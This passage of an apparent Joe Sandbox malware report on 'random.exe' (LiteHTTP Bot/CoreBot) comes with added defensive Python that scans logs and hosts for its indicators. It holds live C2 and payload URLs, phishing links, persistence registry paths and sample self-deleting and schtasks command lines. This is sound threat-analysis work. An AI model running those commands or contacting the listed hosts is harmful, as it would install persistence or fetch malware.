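    "2025-01-15T17:10:41Z 10.0.0.21 POST http://87.120.126.5/VmCetSC7/page.php 200",
    "2025-01-15T17:11:05Z 10.0.0.21 POST http://87.120.126.5/VmCetSC7/page.php 200",
    "2025-01-15T17:12:00Z 10.0.0.34 GET https://tmpfiles.org/dl/15306544/pohtent.exe 200",
    "2025-01-15T17:12:07Z 10.0.0.34 GET https://tmpfiles.org/ 200",
    "2025-01-15T17:13:00Z 10.0.0.50 GET https://www.example.com/index.html 200",
    "not a log line",
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for client, rule, severity, url in found:
        print(f"{severity:6} {rule:24} {client} {url}")
    print("isolate:", hosts_to_isolate(found))
```

A tmpfiles.org download alone is only medium severity because the site is a public file-drop service; the host-only C2 rule is medium for the same reason, since other paths on 87.120.126.5 are not documented here.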
                          Joe Sandbox version:42.0.0 Malachite
                          Analysis ID:1592066
                          Start date and time:2025-01-15 18:09:07 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 44s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 16
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Critical Process Termination
                          Sample name:random.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@14/52@1/2
                          EGA Information:
                          • Successful, ratio: 20%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 166
                          • Number of non-executed functions: 6
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56, 4.175.87.197
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target cEp3d38.exe, PID 5876 because it is empty
                          • Execution Graph export aborted for target random.exe, PID 1692 because it is empty
                          • Execution Graph export aborted for target random.exe, PID 4516 because it is empty
                          • Execution Graph export aborted for target random.exe, PID 5452 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
12:09:59 | API Interceptor | 1019x Sleep call for process: random.exe modified
12:11:04 | API Interceptor | 12x Sleep call for process: cEp3d38.exe modified
17:10:43 | Task Scheduler | Run new task: TaskHelper, path: C:\Users\user\Desktop\random.exe
17:10:47 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run TaskHelper C:\Users\user\Desktop\random.exe
17:10:56 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\random.lnk
17:11:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run TaskHelper C:\Users\user\Desktop\random.exe
17:11:48 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run TaskHelper C:\Users\user\Desktop\random.exe
17:11:57 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cEp3d38.lnk
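The persistence rows above (scheduled task TaskHelper, Run values named TaskHelper under HKLM and HKCU, Startup-folder shortcuts random.lnk and cEp3d38.lnk) together with the behavior graph's random.exe -> cmd.exe -> PING.EXE and random.exe -> schtasks.exe chains are what an incident responder would sweep other hosts for. The following is an added example, not Joe Sandbox code or code from the sample: it evaluates constructed telemetry records (registry Run values, scheduled tasks, a Startup-folder listing and Sysmon-style process events). The cmd.exe and schtasks.exe command lines are assumed typical forms, because the report prints only the signature names, not the exact arguments.

```python
"""Host triage for the persistence and process-chain artefacts in this report.

Added example, not Joe Sandbox or sample code. It runs over constructed
telemetry (registry Run values, scheduled tasks, Startup-folder paths and
Sysmon/EDR-style process events). The command lines are assumed, typical
forms: the report names the signatures but not the exact arguments."""
import re
from dataclasses import dataclass

# Indicators copied from the report's Task Scheduler / Autostart rows.
TASK_NAME = "TaskHelper"                      # schtasks task and Run value name
STARTUP_LNKS = {"random.lnk", "cEp3d38.lnk"}  # Startup-folder shortcuts
RUN_KEYS = {
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU64\Software\Microsoft\Windows\CurrentVersion\Run",  # WOW64 view
}
# Autostart targets under user-writable paths are suspicious on their own.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(desktop|appdata|onedrive|downloads)\\", re.I)
# "Uses ping.exe to sleep" followed by "Self deletion via cmd or bat file".
PING_THEN_DEL = re.compile(r"\bping(\.exe)?\b.*\s-n\s+\d+.*&+\s*del\b", re.I)
SCHTASKS_CREATE = re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.I)
TASK_TARGET = re.compile(r'/tr\s+"?([^"]+?)"?(\s|$)', re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


def check_run_keys(values):
    """values: iterable of (key, value_name, data) read from the Run keys."""
    out = []
    for key, name, data in values:
        if key in RUN_KEYS and (name == TASK_NAME or USER_WRITABLE.match(data)):
            out.append(Finding("run_key_autostart", f"{key}\\{name} = {data}"))
    return out


def check_tasks(tasks):
    """tasks: iterable of (task_name, action_path) from the task scheduler."""
    return [Finding("scheduled_task_autostart", f"{name} -> {path}")
            for name, path in tasks
            if name == TASK_NAME or USER_WRITABLE.match(path)]


def check_startup_folder(paths):
    """paths: iterable of file paths found under ...\\Programs\\Startup."""
    return [Finding("startup_folder_lnk", p) for p in paths
            if p.rsplit("\\", 1)[-1] in STARTUP_LNKS]


def check_process_events(events):
    """events: iterable of dicts with parent_image, image, command_line."""
    out = []
    for ev in events:
        image, cl = ev["image"].lower(), ev["command_line"]
        if image.endswith("\\cmd.exe") and PING_THEN_DEL.search(cl):
            out.append(Finding("ping_sleep_then_self_delete", cl))
        if SCHTASKS_CREATE.search(cl):
            m = TASK_TARGET.search(cl)
            target = m.group(1) if m else ""
            if USER_WRITABLE.match(target) or f"/tn {TASK_NAME}" in cl:
                out.append(Finding("schtasks_create_user_path", cl))
    return out


def triage(run_values, tasks, startup_paths, events):
    """Run every check; return (sorted distinct rule names, all findings)."""
    findings = (check_run_keys(run_values) + check_tasks(tasks)
                + check_startup_folder(startup_paths) + check_process_events(events))
    return sorted({f.rule for f in findings}), findings


# Constructed telemetry mirroring the report, plus benign noise.
SAMPLE_RUN_VALUES = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "TaskHelper",
     r"C:\Users\user\Desktop\random.exe"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
]
SAMPLE_TASKS = [
    ("TaskHelper", r"C:\Users\user\Desktop\random.exe"),
    ("OneDrive Reporting Task", r"C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe"),
]
SAMPLE_STARTUP = [
    r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cEp3d38.lnk",
    r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini",
]
SAMPLE_EVENTS = [  # command lines are assumed, not copied from the report
    {"parent_image": r"C:\Users\user\Desktop\random.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\user\Desktop\random.exe"'},
    {"parent_image": r"C:\Users\user\Desktop\random.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks.exe /create /f /sc onlogon /tn TaskHelper /tr "C:\Users\user\Desktop\random.exe"'},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c ping -n 2 10.0.0.1"},
]

if __name__ == "__main__":
    rules, findings = triage(SAMPLE_RUN_VALUES, SAMPLE_TASKS, SAMPLE_STARTUP, SAMPLE_EVENTS)
    for f in findings:
        print(f"[{f.rule}] {f.evidence}")
```

The user-writable-path test is what keeps the checks useful once the attacker renames TaskHelper: a Run value or task that launches anything from Desktop, AppData or OneDrive is worth a look regardless of the name, while the plain `ping -n 2` from explorer.exe stays quiet because the self-delete half of the pattern is absent.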
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.21.16 | file.exe | malicious | LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar | tmpfiles.org/dl/15306544/pohtent.exe
87.120.126.5 | 3lhrJ4X.exe | malicious | LiteHTTP Bot | 87.120.126.5/VmCetSC7/page.php
87.120.126.5 | 3u8A2xjbBT.exe | malicious | LiteHTTP Bot | 87.120.126.5/VmCetSC7/page.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net | ACH REMITTANCE DOCUMENT 15.01.25.xlsb | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://tinyurl.com/Amconconstruction | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].eml | malicious | HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3D | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://shunnarah.com/attorney/candace-t-brown | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://www.databreachtoday.com/showOnDemand.php?webinarID=6054&rf=OD_REQUEST; | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://yjdjraabb.cc.rs6.net/tn.jsp?f=001cD7EmEKntgjghgQWpq9s2lW_mstWA0PSxRR7i3h0LbK5HgiPx3gu3HduoBs_Rnxmx0i7FlZL9378mrMLd5LlF6GT3bXi2U8GDrXfdsc2qPaLW94j0wm6KbaRHgZvZZRsEDv_wILG0rjmaLTfE5xpKJl15r5SI1xPSSiQsd9YUqKeemOHvTBSlSwV6tHZZ755Z52-jrPWl0FY7ZZ-PKGQ_IxPzhJqeaH15y4Vkailf2jrOpi4MibpjQ==&c=wK30YrUWFPbHl2B1oEErLYSqPkydS65M2el3xt7vMb11ny4WQ0yJgQ==&ch=8IgRaXvzzpu7qgxKTkXdqoYWo2ml_yYytv3GcZQiibggV2wrl_cJAA== | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://aMER.ethamoskag.ru/0cUrcw3/#Mbob@bobco.com | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/ | malicious | HTMLPhisher, ReCaptcha Phish | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://atgroupbe.com/?mzbexmhu=bbd299e40cc6ba4977bf44a725eec5648bda7170169e3fbfd31a05747fa7276fd2437dda5a583d6a5ff345cb6fce6d6bd82e92021cc24ab98d2ebfffc47a5826&qrc=nmertens@vanas.eu | malicious | HTMLPhisher | 13.107.246.45
tmpfiles.org | test.doc.bin.doc | malicious | Unknown | 104.21.21.16
tmpfiles.org | test.doc.bin.doc | malicious | Unknown | 104.21.21.16
tmpfiles.org | test.doc.bin.doc | malicious | Unknown | 104.21.21.16
tmpfiles.org | file.exe | malicious | Amadey, HTMLPhisher, Cryptbot, LummaC Stealer, Stealc, Vidar | 104.21.21.16
tmpfiles.org | lIocM276SA.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, MicroClip, Stealc | 172.67.195.247
tmpfiles.org | file.exe | malicious | LummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, Vidar | 104.21.21.16
tmpfiles.org | trSK2fqPeB.exe | malicious | Amadey, RedLine, XWorm, Xmrig | 104.21.21.16
tmpfiles.org | OmnqazpM3P.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar | 104.21.21.16
tmpfiles.org | SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe | malicious | Unknown | 104.21.21.16
tmpfiles.org | SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe | malicious | Unknown | 104.21.21.16
                           Match | Associated Sample Name / URL | Detection | Threat Name | Context
                           Match: UNACS-AS-BG8000BurgasBG
                           dlr.mips.elf | malicious | Unknown
                           • 87.120.127.227
                           1736928425effdd3d663e7ae08ee64667d92e2866d7996db3d213458dc5837f6c732ac1388894.dat-decoded.exe | malicious | XWorm
                           • 87.120.116.179
                           Order Drawing.exe | malicious | Remcos, PureLog Stealer
                           • 87.120.116.245
                           Material Requirments.exe | malicious | Remcos, PureLog Stealer
                           • 87.120.116.245
                           preliminary drawing.pif.exe | malicious | Remcos, PureLog Stealer
                           • 87.120.127.120
                           5tCuNr661k.exe | malicious | RedLine
                           • 87.120.120.86
                           5tCuNr661k.exe | malicious | RedLine
                           • 87.120.120.86
                           shaLnqmyTS.exe | malicious | RedLine
                           • 87.120.120.86
                           shaLnqmyTS.exe | malicious | RedLine
                           • 87.120.120.86
                           zAGUEDGSTM.exe | malicious | RedLine
                           • 87.120.120.86
                           Match: CLOUDFLARENETUS
                           https://docs.google.com/drawings/d/1Fix-5JDCTM2QJpjq3c_NOGTxMuhYRiEX3wdVSCqQc9w/preview?FwaxQ | malicious | Unknown
                           • 104.21.79.87
                           DOCU800147001.exe | malicious | GuLoader
                           • 104.21.32.1
                           firstontario.docx | malicious | Unknown
                           • 1.1.1.1
                           lummm_lzmb.exe | malicious | LummaC
                           • 104.21.67.165
                           https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082 | malicious | Unknown
                           • 104.21.78.33
                           https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467'' | malicious | Unknown
                           • 104.21.32.1
                           https://tinyurl.com/Amconconstruction | malicious | Unknown
                           • 104.17.25.14
                           Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].eml | malicious | HTMLPhisher
                           • 104.17.25.14
                           https://bluefiles.com/fr/reader/document/2c33782e98658214c7dff875dd234fc3b9b9a60915ac1685fe35abcc657c139d | malicious | Unknown
                           • 1.1.1.1
                           Match | Associated Sample Name / URL | Detection | Threat Name | Context
                           Match: 3b5074b1b5d032e5620f69f9f700ff0e
                           f5mfkHLLVe.dll | malicious | Wannacry
                           • 104.21.21.16
                           hNgIvHRuTU.dll | malicious | Wannacry
                           • 104.21.21.16
                           lummm_lzmb.exe | malicious | LummaC
                           • 104.21.21.16
                           2lX8Z3eydC.dll | malicious | Wannacry
                           • 104.21.21.16
                           aASfOObWpW.exe | malicious | Unknown
                           • 104.21.21.16
                           aASfOObWpW.exe | malicious | Unknown
                           • 104.21.21.16
                           Updater.exe | malicious | Unknown
                           • 104.21.21.16
                           Updater.exe | malicious | Unknown
                           • 104.21.21.16
                           Personliche Nachricht fur e4060738.pdf | malicious | Unknown
                           • 104.21.21.16
                          No context
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1351
                          Entropy (8bit):5.351253520337459
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhgLE4qE4qpsXE4qdKtKIE4oKNzKoZAE4KzeoE4Ks:MxHKlYHKh3ogLHqHpH7tHo6hAHKzeoHP
                          MD5:22A6191126D147A350662EA5A2160456
                          SHA1:68506C08AC2DABCB528EEF5DBE5BA6F68CC24C8A
                          SHA-256:87F4AF4DA90B01F98B968022A935EF201D3121AADD057BBF572385A8F59A6CE6
                          SHA-512:B25282FAF3E3F27ED8DB091085D18C9C0009696CD447F07196173A479E75EEBA3057875336606BECE3A978498869027B8A5686FD6256F2CC97E999D1DCAAC411
                          Malicious:true
                          Reputation:low
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\96012833bebd5f21714fc508603cda97\System.Management.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa1448
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Oct 5 08:16:09 2023, mtime=Wed Jan 15 16:10:42 2025, atime=Wed Jan 15 16:09:58 2025, length=38400, window=hide
                          Category:dropped
                          Size (bytes):626
                          Entropy (8bit):5.0021946644140804
                          Encrypted:false
                          SSDEEP:12:8m5ilClzYNbRrZYUGKE42RyILjA9D6cICM0lAiF4mV:8m5ilVn9vd92RyOAxtdGRm
                          MD5:793AAB430A841A0727BC48458BC62AFA
                          SHA1:D6FD9EB83D72258287F6A1FF2948B795ABB60B0C
                          SHA-256:78928D86A88E81A99785FC72E86341D83A5A396EC2953753704810CF66E32160
                          SHA-512:4F3426EC84B11ADDE93B78D6203948169E294248B09AA4A217A2C392314A49DE792911CFB60C0E82259D7C1524E912F68A6D9710D24D32B2C231007DDD0A9DBB
                          Malicious:false
                          Reputation:low
                          Preview:L..................F.... ....;..l...#..hpg....'Npg...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........DDj....'..l......hpg....`.2...../Z@. .random.exe..F......EW.J/Z@...........................4...r.a.n.d.o.m...e.x.e.......O...............-.......N..............?.....C:\Users\user\Desktop\random.exe..'.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.r.a.n.d.o.m...e.x.e...C.:.\.U.s.e.r.s.\.t.i.n.a.\.D.e.s.k.t.o.p.`.......X.......648351...........hT..CrF.f4... .u...c....,...E...hT..CrF.f4... .u...c....,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\AppData\Roaming\cEp3d38.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\AppData\Roaming\cEp3d38.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\AppData\Roaming\random.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\AppData\Roaming\random.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\autoit3.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\autoit3.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..............0.................. ........@.. ....................................`.................................<...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................p.......H........W...O...........................................................0..8.......s=.....(....}......}......}.....|......(...+.|....(....*.0..r........(.....(.......(.....(.....(....-.r...p+.r...p.(.....(......(.........J...%.r...p.%..(/....%.r...p.%..(/....%.r)..p.%..(/....%.r3..p.%..(/....%.r=..p.%....(/....%..rG..p.%....(/....%..rQ..p.%..~....(/....%..r[..p.%..~....(/....(......~......(....(0.......re..p(........,..rm..p(......J.....r...po........9.........L...%..:.o ...
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\random.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):38400
                          Entropy (8bit):5.495343186946422
                          Encrypted:false
                          SSDEEP:768:XL5VwLMjxZRdazKglRzlllllllFIEDGGFbd4m60/c11UhOo:b5eg1ZRdazKglRzlllllllFVGGFbWQGK
                          MD5:E2E13615DFFAFF99A1D0CD9D32C4CF80
                          SHA1:6B804AAD52F0DFDA2303DDE5C0E641BB20F14FC2
                          SHA-256:71CFDBE5A32FB5CB2A5EFF926C8B9000B231F4990B258872E7CF3A0E4C46BCCF
                          SHA-512:8A331CE713F81BC3050E80CBCA8D6E305EDE44E28684DBCA4E59C2E5FF7D0A05AD50F65DC4D2258FA64110030EC4F9ACBCF5D3E6BA273345BE4FB00C6016EB35
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\OneDrive\common files.exe, Author: Joe Security
                          • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\OneDrive\common files.exe, Author: ditekSHen
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 21%
